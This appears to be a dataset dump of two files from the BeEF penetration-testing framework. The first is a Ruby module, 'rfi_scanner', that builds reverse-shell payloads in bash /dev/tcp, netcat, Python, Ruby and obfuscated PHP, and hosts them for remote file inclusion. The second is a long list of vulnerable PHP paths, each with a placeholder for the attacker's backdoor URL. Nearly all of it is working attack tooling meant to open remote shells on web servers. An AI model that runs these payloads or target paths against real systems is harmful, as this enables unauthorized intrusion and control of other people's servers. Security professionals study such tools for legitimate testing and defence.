language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Ruby
beef/modules/exploits/rfi_scanner/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Rfi_scanner < BeEF::Core::Command def pre_send lhost = '127.0.0.1' lport = 4444 payload = 'reverse_php' @datastore.each do |input| case input['name'] when 'lhost' lhost = input['value'] when 'lport' lport = input['value'] end end @datastore.each do |input| next unless input['name'] == 'payload' case input['value'] when 'reverse_python' # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);") payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`" when 'reverse_netcat' payload = "`nc #{lhost} #{lport} -e /bin/sh`" when 'reverse_ruby' # msfvenom -p cmd/unix/reverse_ruby LHOST=X.X.X.X LPORT=XXXX payload = "`ruby -rsocket -e \"exit if fork;c=TCPSocket.new('#{lhost}','#{lport}');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end\"`" when 'reverse_bash' payload = "`bash -c \"/bin/bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1\"`" else # "reverse_php" # msfvenom -p php/reverse_php LHOST=X.X.X.X LPORT=XXXX payload = <<-EOS $ipaddr='#{lhost}'; $port=#{lport}; @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); $dis=@ini_get('disable_functions'); if(!empty($dis)){ $dis=preg_replace('/[, ]+/', ',', $dis); $dis=explode(',', $dis); $dis=array_map('trim', $dis); }else{ $dis=array(); } #{' '} if(!function_exists('zBoGL')){ function zBoGL($c){ global $dis; #{' '} if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\\n"; } $eclnc='is_callable'; $wGGmd='in_array'; #{' '} if($eclnc('system')and!$wGGmd('system',$dis)){ ob_start(); system($c); $o=ob_get_contents(); ob_end_clean(); }else if($eclnc('popen')and!$wGGmd('popen',$dis)){ $fp=popen($c,'r'); $o=NULL; if(is_resource($fp)){ while(!feof($fp)){ $o.=fread($fp,1024); } } @pclose($fp); }else if($eclnc('passthru')and!$wGGmd('passthru',$dis)){ ob_start(); passthru($c); $o=ob_get_contents(); ob_end_clean(); }else if($eclnc('proc_open')and!$wGGmd('proc_open',$dis)){ $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $o=NULL; while(!feof($pipes[1])){ $o.=fread($pipes[1],1024); } @proc_close($handle); }else if($eclnc('exec')and!$wGGmd('exec',$dis)){ $o=array(); exec($c,$o); $o=join(chr(10),$o).chr(10); }else if($eclnc('shell_exec')and!$wGGmd('shell_exec',$dis)){ $o=shell_exec($c); }else { $o=0; } return $o; } } $nofuncs='no exec functions'; if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ $s=@fsockopen("tcp://#{lhost}",$port); while($c=fread($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=zBoGL(substr($c,0,-1)); if($out===false){ fwrite($s,$nofuncs); break; } } fwrite($s,$out); } fclose($s); }else{ $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); @socket_connect($s,$ipaddr,$port); @socket_write($s,"socket_create"); while($c=@socket_read($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=zBoGL(substr($c,0,-1)); if($out===false){ @socket_write($s,$nofuncs); break; } } @socket_write($s,$out,strlen($out)); } @socket_close($s); } EOS end end BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/plain' }, "<?php #{payload} ?>", "/rfi_php_#{@command_id}.txt", -1) end def self.options configuration = BeEF::Core::Configuration.instance lhost = configuration.beef_host lhost = '' if lhost == '0.0.0.0' [ { 'name' => 'rproto', 'type' => 'combobox', 'ui_label' => 'Target Protocol', 'store_type' => 'arraystore', 'store_fields' => ['rproto'], 'store_data' => [ ['http'], ['https'] ], 'emptyText' => 'Select a protocol (HTTP/HTTPS)', 'valueField' => 'rproto', 'displayField' => 'rproto', 'mode' => 'local', 'autoWidth' => true }, { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, { 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' }, { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', 'store_fields' => ['payload'], 'store_data' => [['reverse_bash'], ['reverse_netcat'], ['reverse_ruby'], ['reverse_python'], ['reverse_php']], 'emptyText' => 'Select a payload', 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'forceSelection' => 'false', 'autoWidth' => true }, { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }, { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width' => '100px' } ] end def post_execute save({ 'result' => @datastore['result'] }) # BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/rfi_php_#{@command_id}.txt") end end
Text
beef/modules/exploits/rfi_scanner/rfi.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere. # Change XXpathXX to the path of your backdoor. Note that you may need to # try it against every directory on the target and because of how this was # culled you may need to add a question mark to your own XXpathXX URL: # Eg: XXpathXX => http://www.example.com/hax.txt? /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX? /123flashchat.php?e107path=XXpathXX /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX /22_ultimate/templates/header.php?mainpath=XXpathXX /22_ultimate/templates/header.php?mainpath=XXpathXX? /=XXpathXX /?_CONFIG[files][functions_page]=XXpathXX /?npage=-1&content_dir=XXpathXX%00&cmd=ls /?npage=1&content_dir=XXpathXX%00&cmd=ls /?show=XXpathXX? /A-Blog/navigation/donation.php?navigation_start=XXpathXX /A-Blog/navigation/latestnews.php?navigation_start=XXpathXX? /A-Blog/navigation/links.php?navigation_start=XXpathXX? /A-Blog/navigation/search.php?navigation_end=XXpathXX? /A-Blog/sources/myaccount.php?open_box=XXpathXX? /ACGVnews/header.php?PathNews=XXpathXX /ATutor/documentation/common/frame_toc.php?section=XXpathXX /ATutor/documentation/common/search.php?section=XXpathXX /ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX /ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX /ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX /AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX? /Administration/Includes/configureText.php?path_prefix=XXpathXX /Administration/Includes/contentHome.php?path_prefix=XXpathXX /Administration/Includes/deleteContent.php?path_prefix=XXpathXX /Administration/Includes/deleteUser.php?path_prefix=XXpathXX /Administration/Includes/userHome.php?path_prefix=XXpathXX /Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX? /Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX? /BE_config.php?_PSL[classdir]=XXpathXX /BPNEWS/bn_smrep1.php?bnrep=XXpathXX?& /Base/Application.php?pear_dir=XXpathXX /Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX /Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX /Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX /Beautifier/Core.php?BEAUT_PATH=XXpathXX? /BetaBlockModules//Module/Module.php?path_prefix=XXpathXX /BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX /BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX /BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX /BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX /BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX /BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX /BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX /BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX /BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX /BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX /BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX /BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX /BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX /BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX /BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX /BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX /BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX /BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX /BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX /BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX /BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX /BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX /BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX /BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX /BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX /BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX /BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX /BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX /BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX /BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX /BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX /BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX /BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX /BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX /BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX /BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX /BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX /BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX /BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX /BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX /Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin /BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX /CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX? /CheckUpload.php?Language=XXpathXX&cmd=ls /Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX? /Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX? /Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX? /Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX? /Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX? /CoupleDB.php?Parametre=0&DataDirectory=XXpathXX? /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX /DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX /DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX? /Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX? /DynaTracker_v151/action.php?base_path=XXpathXX /DynaTracker_v151/includes_handler.php?base_path=XXpathXX /Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX? /Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX? /Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX? /Exophpdesk_PATH/pipe.php?lang_file=XXpathXX /FirstPost/block.php?Include=XXpathXX /Flickrclient.php?path_prefix=XXpathXX /FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX? /FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX? /Full_Release/include/body_comm.inc.php?content=XXpathXX /Gallery/displayCategory.php?basepath=XXpathXX /Include/lib.inc.php3?Include=XXpathXX? /Include/variables.php3?Include=XXpathXX? /Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX /ListRecords.php?lib_dir=XXpathXX?&cmd=id /Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX /MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX /Mamblog/admin.mamblog.php?cfgfile=XXpathXX /Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX? /NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX? /OpenSiteAdmin/indexFooter.php?path=XXpathXX%00 /OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX? /OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00 /OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00 /PHP/includes/header.inc.php?root=XXpathXX? /PHPDJ_v05/dj/djpage.php?page=XXpathXX? /PaTh/index.php?rootpath=XXpathXX /Path_Script/createurl.php?formurl=XXpathXX /PhotoCart/adminprint.php?admin_folder=XXpathXX /Picssolution/install/config.php?path=XXpathXX? /RGboard/include/footer.php?_path[counter]=XXpathXX? /SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX? /SQuery/lib/gore.php?libpath=XXpathXX /SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX? /SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX? /ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX /ScriptPath/footers.php?tinybb_footers=XXpathXX /ScriptPath/index.php?page=XXpathXX /Script_Path/config.inc.php?_path=XXpathXX? /Scripts/app_and_readme/navigator/index.php?page=XXpathXX /Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX /Somery/team.php?checkauth=XXpathXX /Upload/install.php?skindir=XXpathXX /Widgets/Base/Footer.php?sys_dir=XXpathXX /Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX /Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX /Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX /Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX /Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX /WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX? /[path]/mybic_server.php?file=XXpathXX /[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd /_administration/securite.php?cfg[document_uri]=XXpathXX /_blogadata/include/struct_admin.php?incl_page=XXpathXX? /_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX /_connect.php?root=XXpathXX /_friendly/core/data/_load.php?friendly_path=XXpathXX /_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX /_friendly/core/display/_load.php?friendly_path=XXpathXX /_friendly/core/support/_load.php?friendly_path=XXpathXX /_functions.php?prefix=XXpathXX /_includes/settings.inc.php?approot=XXpathXX /_theme/breadcrumb.php?rootBase=XXpathXX /_wk/wk_lang.php?WK[wkPath]=XXpathXX /abf_js.php?abs_pfad=XXpathXX?&cmd=id /about.php?CONFIG[MWCHAT_Libs]=XXpathXX? /about.php?bibtexrootrel=XXpathXX? /aboutinfo.php?bibtexrootrel=XXpathXX? /acc.php?page=XXpathXX /access/login.php?path_to_root=XXpathXX /account.php?insPath=XXpathXX /accsess/login.php?path_to_root=XXpathXX /active/components/xmlrpc/client.php?c[components]=XXpathXX /ad_main.php?_mygamefile=XXpathXX /add.cgi.php?blog_theme=XXpathXX /add_link.php?blog_theme=XXpathXX /addpost_newpoll.php?addpoll=preview&thispath=XXpathXX /addressbook.php?GLOBALS[basedir]=XXpathXX? /addsite.php?returnpath=XXpathXX /addvip.php?msetstr["PROGSDIR"]=XXpathXX /adm/krgourl.php?DOCUMENT_ROOT=XXpathXX? /adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX? /admin.loudmouth.php?mainframe=XXpathXX /admin.php?Madoa=XXpathXX? /admin.php?cal_dir=XXpathXX /admin.php?env_dir=XXpathXX /admin.php?lang=XXpathXX /admin.php?page[path]=XXpathXX?&cmd=ls /admin.php?submit=submit&form_include_template=XXpathXX /admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin /admin/ST_countries.php?include_path=XXpathXX? /admin/ST_platforms.php?include_path=XXpathXX? /admin/addentry.php?phpbb_root_path=XXpathXX? /admin/addons/archive/archive.php?adminfolder=XXpathXX /admin/admin.php?path=XXpathXX /admin/admin.php?site_url=XXpathXX /admin/admin_forgotten_password.php?root_folder_path=XXpathXX /admin/admin_news_bot.php?root_path=XXpathXX? /admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX /admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX /admin/admin_users.php?phpbb_root_path=XXpathXX /admin/auth.php?xcart_dir=XXpathXX? /admin/auth/secure.php?cfgProgDir=XXpathXX? /admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX /admin/bin/patch.php?INSTALL_FOLDER=XXpathXX /admin/catagory.php?language=XXpathXX /admin/classes/pear/OLE/PPS.php?homedir=XXpathXX /admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX /admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX /admin/code/index.php?load_page=XXpathXX /admin/comment.php?config[installdir]=XXpathXX /admin/common-menu.php?CONF[local_path]=XXpathXX /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX? /admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id /admin/directory.php?config[installdir]=XXpathXX /admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX /admin/frontpage_right.php?loadadminpage=XXpathXX /admin/header.php?loc=XXpathXX /admin/inc/add.php?format_menue=XXpathXX /admin/inc/change_action.php?format_menue=XXpathXX /admin/include/common.php?commonIncludePath=XXpathXX? /admin/include/header.php?repertoire=XXpathXX? /admin/include/lib.module.php?mod_root=XXpathXX /admin/includes/admin_header.php?level=XXpathXX? /admin/includes/author_panel_header.php?level=XXpathXX? /admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00 /admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX? /admin/index.php?path_to_script=XXpathXX?&cmd=ls /admin/index.php?pg=XXpathXX? /admin/index.php?xtrphome=XXpathXX /admin/index_sitios.php?_VIEW=XXpathXX /admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX /admin/login.php?absolute_path=XXpathXX /admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls /admin/news.php?language=XXpathXX /admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX /admin/sendmsg.php?config[installdir]=XXpathXX /admin/setup/level2.php?dir=XXpathXX /admin/system/config/conf-activation.php?site_path=XXpathXX /admin/system/include.php?skindir=XXpathXX /admin/system/include.php?start=1&skindir=XXpathXX /admin/system/menu/item.php?site_path=XXpathXX /admin/system/modules/conf_modules.php?site_path=XXpathXX /admin/templates/template_thumbnail.php?thumb_template=XXpathXX /admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?& /admin/themes.php?config[installdir]=XXpathXX /admin/tools/utf8conversion/index.php?path=XXpathXX? /admin/user_user.php?language=XXpathXX /admincp/auth/checklogin.php?cfgProgDir=XXpathXX /admincp/auth/secure.php?cfgProgDir=XXpathXX /adminhead.php?path[docroot]=XXpathXX /admini/admin.php?INC=XXpathXX? /admini/index.php?INC=XXpathXX? /administrator/admin.php?site_absolute_path=XXpathXX? /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX? /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX? /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX /administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX /administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_jreactions/langset.php?comPath=XXpathXX? /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX? /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX? /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX 